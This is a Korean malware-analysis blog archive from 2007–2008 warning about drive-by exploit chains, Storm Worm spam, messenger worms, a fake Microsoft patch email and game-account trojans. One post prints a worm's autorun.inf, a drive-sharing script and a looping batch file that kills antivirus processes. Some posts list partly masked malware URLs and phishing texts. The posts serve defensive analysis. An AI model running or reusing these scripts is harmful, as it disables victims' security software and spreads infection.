태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

신종악성코드정보2008.01.08 13:13


최근 많이 이용되는 리얼플레이어 취약점과 MS06-014 등이 이용되었다.

http://www.computerworlduk.com/management/security/cybercrime/news/index.cfm?newsid=6839
http://isc.sans.org/diary.html?storyid=3810&rss

배포에 사용된 스크립트는 아직도 존재한다.

http://****801*****/0.js

해당 사이트를 통해서 여러 링크가 실행된다.

0.js -> w.js -> 1.html -> 007.js ->ms06014.html -> 1.exe
real007.html -> 06014.js
real007.html -> real.js
real007.html -> 07055.js
real007.html -> yahoo.js

여기서 재밌는건.. 1.exe 가 있는 도메인 주소이다.
월드오브워크래프트(WOW)게임용 트로이목마라는 것을 분석해 보지 않고도 추정할 수 있다.

하지만 분석해 본 결과 The Lord of the Rings Online (반지의 제왕 - http://www.lotro.com)의 계정 탈취용 트로이목마 였다.

http://www.worldofwarcraft*****/1.exe (일부주소 *처리)

Posted by viruslab
TAG ca

댓글을 달아 주세요

  1. 현재 이 악성코드는 국내의 여러 사이트도 해킹되어 포함되어 있어 많이 퍼지고 있어 주의가 필요하다.

    2008.01.08 13:49 신고 [ ADDR : EDIT/ DEL : REPLY ]

신종악성코드정보2008.01.08 09:24


알약이라는 이름의 무료백신이 많은 호응을 얻어서 인지는 몰라도 최근 가루약이라는 이름의 보안제품이 확인되었다.

http://www.garuyac.com/bbs/zboard.php?id=garuyac

일부 백신에서 해당 파일의 일부 모듈을 진단하기도 한다.

개인이 제작하여 배포하는 것으로 보인다.

Antivirus Version Last Update Result
AhnLab-V3 2008.1.7.11 2008.01.07 -
AntiVir 7.6.0.46 2008.01.07 DR/Dldr.Agent.256700
Authentium 4.93.8 2008.01.06 -
Avast 4.7.1098.0 2008.01.06 -
AVG 7.5.0.516 2008.01.07 -
BitDefender 7.2 2008.01.07 -
CAT-QuickHeal 9.00 2008.01.05 -
ClamAV 0.91.2 2008.01.07 -
DrWeb 4.44.0.09170 2008.01.07 Trojan.DownLoader.origin
eSafe 7.0.15.0 2008.01.06 -
eTrust-Vet 31.3.5438 2008.01.07 -
Ewido 4.0 2008.01.07 -
FileAdvisor 1 2008.01.07 -
Fortinet 3.14.0.0 2008.01.06 W32/Agent!tr.dldr
F-Prot 4.4.2.54 2008.01.06 -
F-Secure 6.70.13030.0 2008.01.07 Trojan-Downloader.Win32.Agent.gen
Ikarus T3.1.1.15 2008.01.07 -
Kaspersky 7.0.0.125 2008.01.07 Trojan-Downloader.Win32.Agent.gen
McAfee 5200 2008.01.04 -
Microsoft 1.3109 2008.01.07 -
NOD32v2 2769 2008.01.07 -
Norman 5.80.02 2008.01.04 -
Panda 9.0.0.4 2008.01.07 -
Prevx1 V2 2008.01.07 -
Rising 20.26.02.00 2008.01.07 -
Sophos 4.24.0 2008.01.07 -
Sunbelt 2.2.907.0 2008.01.05 -
Symantec 10 2008.01.07 -
TheHacker 6.2.9.183 2008.01.07 -
VBA32 3.12.2.5 2008.01.06 -
VirusBuster 4.3.26:9 2008.01.06 -
Webwasher-Gateway 6.6.2 2008.01.07 BlockReason.0
Additional information
File size: 256700 bytes
MD5: cef6e2ba0ec9fad1f63954b5d5bccff9
SHA1: d1f4f26c698065b0e8591caf88a97915bfce344d


외국에서는 알 수 없는 한국의 프로그램이 의심파일로 신고가 다수 접수되고, 다운로드 기능 등이 포함되어 있고, 일부 백신이 GD(Generic Detection)로 진단하자 다소 오해를 일으킨 것으로 보인다.

여기서 흥미로운 것은 "가루약"이라는 이름(프로그램 의미)을 이해할 수 없는 외국의 보안업체들은 업데이트 모듈을 악성코드(Downloader)로 추가하는 모습을 볼 수 있다.

특히 AntiVir 같은 경우는 파일크기까지 동일하게 진단명에 추가하였는데, 악성코드라고 최종 진단(추가)한 것으로 보인다.

처음에는 Kaspersky 와 Dr.Web 만 진단했는데, 국내의 많은 유저들이 의심파일로 바이러스 토탈에 다수 등록하면서 외국 업체들이 하나 둘 씩 반응을 보이고 있다.

개인적으로는 단순히 업데이트 모듈로 False Positive 로 봐야 맞을 듯 싶다.
이러한 현상(줄줄이 오진)이 발생하는 경우가 종종 있다.

한 백신업체가 하나의 파일을 오진하면 다른 업체들이 따라서 악성코드로 추가하는 경우이다.

물론 다운로드(시도)되는 파일이 어떠한 것이냐에 따라 그 결과가 최종 결정된다.

단순히 정상 프로그램을 다운로드 하는 것을 다운로더형 트로이목마로 단정짓는 것은 잘못된 판단이므로 지금 최종 다운로드되는 파일을 확인해 보는 것이 중요하다.

현재 다운로드 되는 순서는 아래와 같고, 일부 백신에서 진단되는 파일은 GaruYacUpdate.exe 이다.

http://www.garuyac.comcounter/run_update.html
http://www.garuyac.com/
http://www.garuyac.comupdate/update.php
http://www.garuyac.com/file/update_check.exe

최종적으로 다운로드 되는 update_check.exe 를 확인해 보았다.

NSIS로 제작되어 있으며, 설치한 자기 자신을 지우는 모듈(SelfDelete.dll)과 DLLWaitForKillProgram.dll, InstallOptions.dll, KillProcDLL.dll 등 특별히 다른 파일에 영향을 끼치는 모듈은 확인되지 않았다.

대부분 자신의 모듈을 삭제하거나 프로세스를 종료하는 기능이다.
이것으로 보아 업데이트용 모듈로 볼 수 있고, 악성코드로 보기에는 무리가 있을 것 같다.

기회가 되면 Kaspersky Lab 에 알려주어야 겠다. ^^
Posted by viruslab
TAG 가루약

댓글을 달아 주세요

  1. 관련 자료를 확인해 보니..이 프로그램을 제작한 분이 누군지 알게 되었다. 외국 백신이 진단하고 있는 부분에 대해서 설명드렸으니 다음에 수정이 되지 않을까 싶다.

    2008.01.08 10:18 신고 [ ADDR : EDIT/ DEL : REPLY ]
  2. 물약, 양약, 한약, 마약,, -_-;;
    이런것도 아류작으로 나오면 재미있겠네요 ㅋㅋ

    2008.01.08 16:24 신고 [ ADDR : EDIT/ DEL : REPLY ]

신종악성코드정보2008.01.03 11:10


MS06-014, MS07-017 취약점을 주로 이용하던 중국발 해킹이 최근 변경되어 사용되기 시작했다.
오늘 새벽에 게임과 영화 관련 사이트가 해킹되어 이 코드를 이용하는 것이 추가 목격되었다.

물론 이번에도 혹시나 싶었는지 MS06-014 Code를 내부에 하나 더 포함시켜 두기는 했다.

중국해커들이 제로데이 공격에 목말라 하는 반증이 아닐까 싶기도 하다.

보안패치가 많이 이루어져서 기존 취약점으로는 악성코드 유포에 한계가 있다고 생각을 했나보다.
새로운 공격시도는 음악 관련 제품으로.. 2가지이다.

첫 번째는 2007년 9월 19일경에 공개된 제트오디오의 액티브 액스 다운로드 취약점이다.

http://www.milw0rm.com/exploits/4427

제트오디오 7.x 사용자분들은 각별히 주의해야 하며, 제트오디오 사용 중 Download Manager 창이 나타난다면 취약점 공격을 의심해 보는 것이 좋다. 근데 제트오디오 쓰시는 분을 못 본지 오래인데..중국해커들이 효과를 볼 지는 미지수다.

이 취약점을 임시적으로 예방하기 위해서는 아래와 같은 레지스트리를 등록(killbit)하면 효과를 볼 수 있다.

-------------------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8D1636FD-CA49-4B4E-90E4-0A20E03A15E8}]
"Compatibility Flags"=dword:00000400
-------------------------------------------------------------------------------------------

제트오디오 취약점 코드 밑에는 리얼플레이어 취약점을 추가로 링크하여 실행하도록 만들어 두었다.
국내에서는 상대적으로 리얼플레이어 사용자가 적으니 좀 다행이 아닐 까 싶기도 하다.


Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2008.01.03 09:29


Nuwar, Zhelatin, Storm Worm 등으로 알려져 있는 웜 메일이 지속적으로 유포되고 있다.

오늘 새벽부터 도메인이 변경된 것이 추가 발견되었다.

이것을 유포하는 제작자(그룹)는 Bot Net 을 구성하여 금전적인 이득을 챙기기 위해서 사용하는 것으로 보인다.
대표적으로 SPAM 메일을 대행해 주거나 최근 문제시되는 DDoS 형태의 공격 전초기지로 악용이 가능하다.

사용자 삽입 이미지

이러한 링크를 무심코 클릭하거나 파일을 실행하지 않도록 각별히 주의해야 겠다.
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.30 10:42


Happy 2008!
http://familypostcards2008[삭제]

메일내용과 파일이 변형되어 다시 유포중입니다.
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.29 17:41


http://www.dr-web.co.kr

사용자 삽입 이미지
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.29 10:01


MSN 메신저로 2008년 신년 관련 사진으로 위장된 악성코드가 유포되고 있다.

New-Year2008-imgaes.zip
New-year2008-image15.scr

http://www.virscan.org/report/9c8c22ae619c8ac94eba1d2100390e59.html
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.29 08:41


http://newyearwithlove[삭제]/happynewyear2008.exe

새해 인사 관련 악성코드가 계속 변형되어 퍼지고 있어 각별히 조심해야 합니다.
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.28 18:37


모두 아시겠지만 어제 베나지르 부토 전 총리가 폭탄테러로
암살되어 파키스탄 정국이 사상 최악으로 치달으면서 자칫
내전으로 격화되는게 아니냐는 우려섞인 목소리가 나오고 있습니다.

이와 관련하여 부토 관련 외국 사이트에서 악성코드가 유포중인것이
확인되었습니다.

http://www.websense.com/securitylabs/alerts/alert.php?AlertID=834
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.28 10:06


stripshow.exe
happy2008.exe
happy-2008.exe
happynewyear2008.exe

파일명과 유포 링크가 계속 변경되어 확산되고 있다.
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.27 13:35


새로운 MSN 메신저 웜이 출현했다.

image110-newfacebook.JPG-scannedby-MSN.com

MD5 : ae5fcee5f212c6296e0dad4abb1801f4
크기 : 73,216 바이트
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.27 08:37


Nuwar, Storm, Zhelatin 등의 진단명을 가진 웜이 어제 밤부터 또 다시 변경되어 유포중이다.

이메일로 아래와 같은 내용을 수신하면 절대로 링크를 클릭하여 악성코드를 설치하지 않도록 하는 것이 안전하다.

사용자 삽입 이미지

링크를 클릭하게 되면 해당 사이트로 접속되면서 사용자의 클릭을 유도하는 문구와 악성코드 링크가 보여진다.

사용자 삽입 이미지

click here 라는 부분을 클릭하거나 약 15초 후에 happy-2008.exe 라는 악성코드가 받아지게 된다.
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.26 08:48


연말연시를 맞아 신종 악성코드가 추가 발견되었다.

happy2008.exe 라는 파일명을 이용하여 사용자의 클릭을 유도하며, 아래와 같은 이메일 형식과 링크를 포함하고 있다.

링크를 클릭하게 될 경우 아래와 같은 창이 나타난다.

Your download should begin shortly. If your download does not start in approximately 15 seconds,
you can click here to launch the download and then press Run. Enjoy!

click here 라는 부분에 악성코드가 링크되어 있다.

사용자 삽입 이미지
Posted by viruslab

댓글을 달아 주세요

  1. 변종은 파일명 변경

    happy-2008.exe

    2007.12.26 15:01 신고 [ ADDR : EDIT/ DEL : REPLY ]

신종악성코드정보2007.12.24 13:27


크리스마스 시즌에 연말연시에는 악성코드가 특히 많이 유포된다.

연하장을 위장하거나 크리스마스 선물 등으로 위장하는데, 오늘도 새로운것이 확산중에 있다.
stripshow.exe 라는 파일명이며, MD5 는 매번 변경되고 있다.

사용자 삽입 이미지

이미 이 웜의 제작자는 여러가지 변종을 제작해서 유포했던 사람으로 Botnet 을 구성하여 스팸메일 대행으로 수익을 버는것으로 보인다.

뭐 요즘에는 봇넷 자체를 팔기도 하니, 악성코드와 돈과의 결탁은 내년에도 이어질 것으로 전망된다.

사용자 삽입 이미지
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.24 12:24


MD5 : 6f76ce109cf3b107d80558f9b3fb7091
크기 : 2,048 바이트

구글 애드센스의 광고수익을 노린 악성코드는 이미 여러 번 보고된 적이 있다.
내년에는 좀더 많은 위협이 되지 않을까 생각도 된다.

비트디펜더
http://www.bitdefender.com/site/VirusInfo/showVirusInfo/1589

트랜드마이크로
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ%5FQHOST%2EGC&VSect=T

전자신문
http://www.etnews.co.kr/news/detail.html?id=200712210129

사이트에 등록된 구글 광고를 다른 링크로 바꿔치기하여 수익을 가로채는 방식이다.

샘플을 확인해 봤는데 매우 심플하게 제작되어 있고, 사용된 IP주소는 네덜란드로 보인다.

구글이 앞으로 AV 사업에 더 많은 투자나 관심을 가지게 되는 계기가 되는것은 아닐까 싶기도 하다.

Posted by viruslab

댓글을 달아 주세요

  1. 이런것도 있었군요.
    내광고도 유심히 살펴봐야겠네요.

    좋은 정보 고맙습니다.
    메리크리스마스 ^^

    2007.12.24 21:22 신고 [ ADDR : EDIT/ DEL : REPLY ]

신종악성코드정보2007.12.18 09:09


이메일 제목이 "Card from Adult Sex Finder" 라는 내용으로 악성코드가 첨부되어 배포되고 있다.

몇가지 다른 형태가 존재한다.

제목 : Card from Adult Sex Finder

내용 :
Good morning, dear! Monica T. sent you animated card with her photos. You can check card in your attachment. --
Regards
Adult Friend Finder

제목 : Card from Adult Sex Finder

내용 :
Hi, friend!

Natasha sent you animated card with her nude photos. You can check card in your attachment.

--
{Best regards, Regards}
 Adult Sex Finder.

제목 : Card from Adult Sex Finder

내용 :
Good evening, dear!

Jane sent you animated card with her photos. You can check card in your attachment.

--
Regards,
Adult Sex Finder

첨부파일은 card.zip 으로 되어 있으며, 압축을 풀면 card.scr 파일을 포함하고 있으며, 두가지 변종이 발견됐다.

MD5 :
536bfc077fbad247fa5ea67adf1dca7d
1daf5d40312a70330235cb5277147acd
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.14 11:43


크리스마스가 가까워 오자 또 유사 내용(사회공학적)으로 유인하는 악성코드가 출현했다.
MSN 메신저 등으로 유포되고 있으니 주의가 필요하다.

Marry_Christmas_jpg.zip

마치 jpg 라는 이름을 가지고 있어 그림파일처럼 위장한다.

압축을 풀면 역시나 실행파일이다.

www.marry_christmas_jpg_msn.com

Posted by viruslab

댓글을 달아 주세요

  1. Marry 가 아니라 Merry 인데..^^

    2007.12.27 14:13 신고 [ ADDR : EDIT/ DEL : REPLY ]

신종악성코드정보2007.12.11 11:11


중국에서 제작된 이 웜은 몇 가지 위장 속임수를 사용하면서 자신을 보호한다.

아래의 경로에 아래와 같은 파일들을 설치한다.

%systemroot%\system32\SDGames.exe
%systemroot%\system32\Taskeep.vbs
%systemroot%\system32\Avpser.cmd
%systemroot%\system32\netshare.cmd
%systemroot%\system32\AUTORUN.INF

Autorun.inf 파일을 이용해서 자동실행 기법을 이용한다.

[Autorun]
OPEN=SDGames.exe
Shell\Open=打?(^&O)
Shell\Open\Command=SDGames.exe
Shell\Explore=?源管理器(^&X)
Shell\Explore\Command=SDGames.exe

사용자 삽입 이미지


휴지통(Recycleds.url)과 윈도우 폴더(Windows.url)로 위장한 웹 문서 바로가기를 만들어 악성코드인 SDGames.exe 가 실행되도록 만든다.

물론 위의 화면에서는 숨김속성 파일을 모두 보이게 조치했지만 실제로는 숨김속성 파일과 폴더는 모두 보여지지 않는다. (폴더 옵션 메뉴를 제거하기 때문에 일반 사용자는 속성변경 자체가 어렵다.)

사용자 삽입 이미지

사용자 삽입 이미지

netshare.cmd 를 이용해서 모든 드라이브 공유(쓰기권한)를 시도하고 네트워크 확산에 사용한다.

net share A=A:
net share B=B:
net share C=C:
net share D=D:
net share E=E:
net share F=F:
net share G=G:
net share H=H:
net share I=I:
net share J=J:
net share K=K:
net share L=L:
net share M=M:
net share N=N:
net share O=O:
net share P=P:
net share Q=Q:
net share R=R:
net share S=S:
net share T=T:
net share U=U:
net share V=V:
net share W=W:
net share X=X:
net share Y=Y:
net share Z=Z:

사용자 삽입 이미지

Avpser.cmd 는 taskkill 명령어를 이용해서 다양한 보안프로그램의 프로세스 종료를 시도한다.

사용자 삽입 이미지

@echo off
:k
Set p=taskkill /f /im /t
sc config winmgmt start= AUTO & net start winmgmt
%p% RavMonD.exe
%p% RavStub.exe
%p% Anti*
%p% AgentSvr*
%p% CCenter*
%p% Rsaupd*
%p% SmartUp*
%p% FileDsty*
%p% RegClean*
%p% 360tray*
%p% 360safe*
%p% kabaload*
%p% safelive*
%p% KASTask*
%p% kpFW32*
%p% kpFW32X*
%p% KvXP_1*
%p% KVMonXP_1*
%p% KvReport*
%p% KvXP*
%p% KVMonXP*
%p% nter*
%p% TrojDie*
%p% avp.com
%p% KRepair.COM
%p% Trojan*
%p% KvNative*
%p% Virus*
%p% Filewall*
%p% Kaspersky*
%p% JiangMin*
%p% RavMonD*
%p% RavStub*
%p% RavTask*
%p% adam*
%p% cSet*
%p% PFWliveUpdate*
%p% mmqczj*
%p% Trojanwall*
%p% Ras.exe
%p% runiep.exe
%p% avp.exe
%p% PFW.exe
%p% rising*
%p% ikaka*
%p% .duba*
%p% kingsoft*
%p% 木?*
%p% 社?*
%p% aswBoot*
%p% MainCon*
%p% Regs*
%p% AVP*
%p% Task*
%p% regedit*
%p% Ras*
%p% srgui*
%p% norton*
%p% avp*
%p% fire*
%p% spy*
%p% bullguard*
%p% PersFw*
%p% KAV*
%p% ZONEALARM*
%p% SAFEWEB*
%p% OUTPOST*
%p% ESAFE*
%p% clear*
%p% BLACKICE*
%p% 360safe.exe
%p% Shadowservice.exe
%p% v3webnt.exe
%p% v3sd32.exe
%p% v3monsvc.exe
%p% sysmonnt.exe
%p% hkcmd.exe
%p% DNTUS26.EXE
%p% AhnSD.exe
%p% CTFMON.EXE
%p% MonsysNT.exe
%p% awrem32.exe
%p% WINAW32.EXE
%p% PNTIOMON.exe
%p% avgw.exe
%p% avgcc32.exe
%p% PROmon.exe
%p% PNTIOMON.exe
%p% MagicSet.exe
%p% MainCon.exe
%p% TrCleaner.exe
%p% WmNetPro.exe
%p% 修?*
%p% 保?*
goto k
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.12.10 13:42


곰 플레이어 아이콘을 사용한 것이 특징이다.

C:\WINDOWS\smss.exe
C:\WINDOWS\killer.exe
C:\WINDOWS\Funny UST Scandal.exe
C:\autorun.inf
C:\smss.exe
C:\Funny UST Scandal.avi.exe

MD5 : 6920268c9240195c135a87327244beeb
Pack : UPX 3.00
Compile :AutoIt v3 Script

그외 다른 루트 드라이브에도 복사본을 생성한다.

사용자 삽입 이미지
Posted by viruslab
TAG GOM

댓글을 달아 주세요

  1. 음.. 곰플레이어도 이제 많이 알려졌나보군요.. ㅋㅋ
    악성코드의 아이콘으로 쓰일정도라니..

    2007.12.10 14:20 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 사람을 겉만 보고 판단하면 안되듯이, 악성코드도 아이콘만 보고 판단하면 안되는 세상..^^;;

      2007.12.10 15:55 신고 [ ADDR : EDIT/ DEL ]
  2. MD5 : 65d52f063bca0deff652424c9e359675 변종 추가 발견

    2007.12.11 18:00 신고 [ ADDR : EDIT/ DEL : REPLY ]

신종악성코드정보2007.12.06 08:46


Roel December 05, 2007

Over the last couple of days I've been looking at some of the latest tricks used by the creators of some adware - Virtumonde a.k.a Vundo. Virtumonde is notoriously hard to remove from an infected machine and with a new infection vector added, the program's got even tricksier.
The authors are now using file infection so Virtumonde checks which files run at Windows startup and tries to infect them. Effectively this means that Virtumonde turns the original host file into a Trojan-Dropper.

Dropper code is prepended to the original host file, with a copy of Virtumonde being appended to the same file. When the infected file is launched it drops the original host file to %temp% and the Virtumonde file to the system directory.

Although Virtumonde is using an infection marker to prevent re-infecting the same file over and over again, this doesn't always work. There are samples of already infected files being re-infected and the host file then won't run. However, re-infection doesn't prevent Virtumonde itself from running.

Because this code is self-replicating we're dealing with a classic prepending virus. Unlike some other adware we've blogged about that uses a similar approach, this isn't a Patcher Trojan.

This new trick from the Virtumonde authors is pretty easy to detect and disinfect. (We detect it as Virus.Win32.Trats.a). Although this variant didn't cause any headaches from a technical point of view, we can expect some interesting challenges if Virtumonde continues to evolve.

Posted by viruslab
TAG Vundo

댓글을 달아 주세요

신종악성코드정보2007.11.22 13:47


파일 또는 폴더 삭제 오류
파일 항목을 삭제할 수 없습니다. 원본 파일이나 디스크에서 읽을 수 없습니다.

사용자 삽입 이미지

최근에 위와 같은 오류창이 나온다면 아래 내용을 확인해 보는 것이 좋다.
시스템 폴더에 ntspl.exe 이 존재하며, 루트킷 드라이버(은폐가능)로 ntspldrv.sys 파일이 존재할 수 있다.

사용자 삽입 이미지

아래 레지스트리 값을 찾아서 삭제 후에 (2회)재부팅하고, ntspl.exe 와 ntspldrv.sys 파일을 찾아 제거한다.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windows NT Service Dispatch Platform
ImagePath
(시스템 폴더)\ntspl.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ntspldrv
ImagePath
(시스템 폴더)\ntspldrv.sys

Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.11.16 09:44


MS07-055 라는 마이크로소프트사의 보안패치 파일처럼 속이는(Patch Trick) 악성코드가 발견되었다. 스팸성 메일을 통해서 배포되며, 특정 사이트의 링크로 존재한다.

WindowsXP-KB923810-x86-ENU.exe
1,057,651 바이트
MD5 : b59d788bc907d9aecb15375abe09c606

Virut Total 진단현황
AhnLab-V3 2007.11.15.0 2007.11.14 -
AntiVir 7.6.0.34 2007.11.14 TR/Drop.Agent.cqf
Authentium 4.93.8 2007.11.14 -
Avast 4.7.1074.0 2007.11.13 -
AVG 7.5.0.503 2007.11.14 Dropper.VB.KO
BitDefender 7.2 2007.11.14 -
CAT-QuickHeal 9.00 2007.11.14 -
ClamAV 0.91.2 2007.11.14 -
DrWeb 4.44.0.09170 2007.11.14 Trojan.MulDrop.9553
eSafe 7.0.15.0 2007.11.14 suspicious Trojan/Worm
eTrust-Vet 31.2.5294 2007.11.14 -
Ewido 4.0 2007.11.14 -
FileAdvisor 1 2007.11.14 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.14 -
F-Secure 6.70.13030.0 2007.11.14 Trojan-Dropper.Win32.Agent.cqf
Ikarus T3.1.1.12 2007.11.14 Trojan.Win32.VB.azd
Kaspersky 7.0.0.125 2007.11.14 Trojan-Dropper.Win32.Agent.cqf
McAfee 5163 2007.11.14 -
Microsoft 1.3007 2007.11.12 -
NOD32v2 2658 2007.11.14 -
Norman 5.80.02 2007.11.14 -
Panda 9.0.0.4 2007.11.14 Generic Backdoor
Prevx1 V2 2007.11.14 -
Rising 20.18.20.00 2007.11.14 -
Sophos 4.23.0 2007.11.14 Troj/VBDrop-D
Sunbelt 2.2.907.0 2007.11.14 -
Symantec 10 2007.11.14 Backdoor.Bandock.A
TheHacker 6.2.9.128 2007.11.14 -
VBA32 3.12.2.4 2007.11.11 -
VirusBuster 4.3.26:9 2007.11.14 -
Webwasher-Gateway 6.0.1 2007.11.14 Trojan.Drop.Agent.cqf
Additional information
File size: 1057651 bytes
MD5: b59d788bc907d9aecb15375abe09c606
SHA1: bff09f750ecda788e608efcde358e8778f1e3168

제목:
Microsoft Security Bulletin MS07-055 - Critical

내용:

Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution (923810)
Published: October 9, 2007 | Updated: October 17, 2007
Version: 1.1

General Information
Executive Summary

This critical security update resolves a privately reported vulnerability. A remote code execution vulnerability exists in the way that the Kodak Image Viewer, formerly known as Wang Image Viewer, handles specially crafted images files. The vulnerability could allow an attacker to remotely execute code on the affected system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

This vulnerability exists only on systems running Windows 2000. However, systems running supported 32-bit editions of Windows XP and Windows Server 2003 may also be affected if upgraded from Windows 2000. This is a critical security update for Windows 2000 Service Pack 4, 32-bit editions of Windows XP Service Pack 2, and supported 32-bit editions of Windows Server 2003. For more information, see the subsection, Affected Software, in this section.

This security update addresses the vulnerability by deprecating file types that are no longer supported as well as by improving the way that the Kodak image viewer handles specially crafted file types. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.

Recommendation. Microsoft recommends that customers apply the update immediately following the links below coresponding to your system.

Affected and Software

The software listed here have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle <http://postform.[생략].com/securityupdate/index.php?q=aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL2Rvd25sb2Fkcy9kZXRhaWxzLmFzcHg%2FRmFtaWx5SWQ9YmU1MmY3NDAtZTljOS00MjI4LTk1YzAtMDA5OTUyMTNiYmQwJmRpc3BsYXlsYW5nPWVu&hl=1ed> .

Affected Software

Operating System

Maximum Security Impact

Aggregate Severity Rating

Bulletins Replaced by This Update

Microsoft Windows 2000 Service Pack 4 <http://postform.[생략].com/securityupdate/index.php?q=aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL2Rvd25sb2Fkcy9kZXRhaWxzLmFzcHg%2FRmFtaWx5SWQ9Mjk3NjMxMTctYzJkYy00NzQ2LWIzMWUtMGIyNzM1MDExOGU2JmRpc3BsYXlsYW5nPWVu&hl=1ed>
Remote Code Execution

Critical

None

Windows XP Service Pack 2 <http://postform.[생략].com/securityupdate/index.php?q=aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL2Rvd25sb2Fkcy9kZXRhaWxzLmFzcHg%2FRmFtaWx5SWQ9YmU1MmY3NDAtZTljOS00MjI4LTk1YzAtMDA5OTUyMTNiYmQwJmRpc3BsYXlsYW5nPWVu&hl=1ed>
Remote Code Execution

Critical

None

Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2 <http://postform.[생략].com/securityupdate/index.php?q=aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL2Rvd25sb2Fkcy9kZXRhaWxzLmFzcHg%2FRmFtaWx5SWQ9OWE1YzllNWQtNDkwOC00OGJmLTkzNDYtNzQ1YjRjNmY2ZDRlJmRpc3BsYXlsYW5nPWVu&hl=1ed>
Remote Code Execution

Critical

None

© 2007 Microsoft Corporation. All rights reserved.

--
This email has been verified as Virus free
Virus Protection and more available at http://www.plus.net
Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2007.11.16 09:19


사용자 삽입 이미지

세계 최대 하드 디스크 드라이브(HDD) 제조업체인 시게이트(Seagate)가 네덜란드와 대만에서 악성코드가 포함된 하드디스크를 판매하는 실수를 저질렀다.

피해를 입은 대만 현지 일부 사용자들은 중국 정부기관이 사이버 스파이를 통해 조직적으로 정보를 빼돌렸을 것이라며 음모론까지 제기하고 있는 상황이지만, 감염된 악성코드가 특정 게임 계정을 노리는 트로이목마로 정부 기관과는 무관해 보인다.

WSGame
91.com
QQ
Woool
rxjh.17game.com
TianLongBaBu
AskTao
Perfect World (Wanmei Shijie)
World of Warcraft

시게이트 홈페이지에는 Virut Total 에 진단된 로그를 공개하였고, Kaspersky 백신제품에서는 Virus.Win32.AutoRun.ah 와 Virus.Win32.AutoRun.ji 등이 진단된 것을 볼 수 있다.

http://www.seagate.com/www/en-us/support/downloads/personal_storage/ps3200-sw

시게이트 홈페이지에서는 Kaspersky 제품을 사용할 수 있게 하고 있다.

http://www.kaspersky.nl/downloads/versie7/kav7_en_seagate.exe

트랜드 마이크로에 의하면 여러 종류의 악성코드가 포함되어 있다고 하며, 정보가 유출되는 서버 중에는 한국 사이트도 포함되어 있다고 한다.

http://blog.trendmicro.com/seagate-hard-disks-carry-malware

  • BKDR_AGENT.ZYG
  • BKDR_AGENT.ZYJ
  • BKDR_BIFROSE.AZF
  • TROJ_MAC.AB
  • TROJ_MAC.AZ
  • WORM_AUTORUN.FW
  • WORM_MAC.AA
  • WORM_MAC.BB
  • WORM_MAC.CC
  • WORM_MAC.DD
  • Posted by viruslab

    댓글을 달아 주세요

    신종악성코드정보2007.11.15 17:09


    온라인 게임관련 정보를 탈취하기 위한 트로이목마는 끊임없이 제작되어 유포되고 있다.

    반지의 제왕 게임을 목표로 한 트로이목마도 발견되었는데, 최근 많은 사용자가 감염되는 형태의 트로이목마이다.

    TurbineLauncher.exe 모듈의 실행을 감시하여 작동한다.

    Auto.exe 와 Autorun.inf 등이 설치되며, IGM.exe 등이 존재할 수 있다.

    Posted by viruslab

    댓글을 달아 주세요

    신종악성코드정보2007.11.10 11:16


    Virut 은 .EXE 나 .SCR 등의 실행파일을 감염시켜서 활동하는 바이러스이다.

    폴리모픽(다형성)에 시작점 불명확기법(EPO), 암호화(XOR) 등을 이용하며, 메모리 감염, Winlogon.exe 삽입 등으로 치료가 쉽지 않은 종류이다.

    최근까지 약 49종의 변종이 나오고 있으며, 제작자가 계속 변종을 만들고 있고, 일부 버전은 ASM 소스도 공개되어있다. 최신 변종을 진단하는 백신은 그리 많지 않으니 조심해야 겠다.

    또한, 가장 근래에 발견된 것들은 내부에 Downloader 기능을 넣어두어, 디버깅할 때 바이러스가 아닌 것으로 잘못 분석할 수도 있고, 실제로 일부 백신은 트로이목마로 추가하고 있어 감염된 파일을 치료하지 않고 삭제하는 경우도 보인다.
    Posted by viruslab

    댓글을 달아 주세요

    신종악성코드정보2007.11.09 13:10


    이상한 프로그램이 또 문제네요.

    파일이나 폴더를 숨겨주는 유틸리티인데 문제는 다른 광고프로그램들에 의해서 사용자 동의없이 배포되어 설치되고, 본인인증하기를 하면 휴대폰 소액결재 창을 보여주어 과금을 유도하네요.

    악성코드로 보였는지 안철수 연구소에서 해당 파일을 진단하자 마이컴고에 공지가 올라왔네요.
    안철수 연구소에 전화해서 항의하라는 어처구니 없는 글이네요.

    http://www.mycomgo.com/customer/notice/content.jsp?tb_name=tb_notice&nt_id=15&nt_listnum=11

    삭제방법
